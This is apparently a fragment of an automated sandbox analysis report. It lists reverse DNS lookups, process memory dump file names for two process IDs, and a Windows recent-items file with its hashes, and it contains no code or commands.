| US | 8.8.8.8:53 | 167.178.46.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.49.80.91.in-addr.arpa | udp |
Files
memory/4808-2-0x00007FFE220F0000-0x00007FFE22100000-memory.dmp
memory/4808-1-0x00007FFE220F0000-0x00007FFE22100000-memory.dmp
memory/4808-3-0x00007FFE6210D000-0x00007FFE6210E000-memory.dmp
memory/4808-0-0x00007FFE220F0000-0x00007FFE22100000-memory.dmp
memory/4808-5-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-6-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-7-0x00007FFE220F0000-0x00007FFE22100000-memory.dmp
memory/4808-11-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-15-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-16-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-17-0x00007FFE1FA60000-0x00007FFE1FA70000-memory.dmp
memory/4808-14-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-18-0x00007FFE1FA60000-0x00007FFE1FA70000-memory.dmp
memory/4808-13-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-12-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-10-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-20-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-19-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-9-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-8-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-4-0x00007FFE220F0000-0x00007FFE22100000-memory.dmp
memory/4192-40-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4192-43-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4192-44-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4192-45-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4192-46-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-48-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4192-52-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4192-53-0x00007FF7A85C0000-0x00007FF7A85C8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | 9056d632bc247d00191d7d1218f28c4a |
| SHA1 | 0e5e49802533f1c8c57194b29d6755258ba04fef |
| SHA256 | a66c800e76372ee169468a5794064a9249554ca721f5e88723f4444f003568fd |
| SHA512 | 42b0941b6d9574bd8fcf8a5ee8e6b97446d12bf41af22ac6cf6a65c6196383c5b2705eee13ec07b585cd96252d296fa2e7dcead54a6618458849b5278dd8c19f |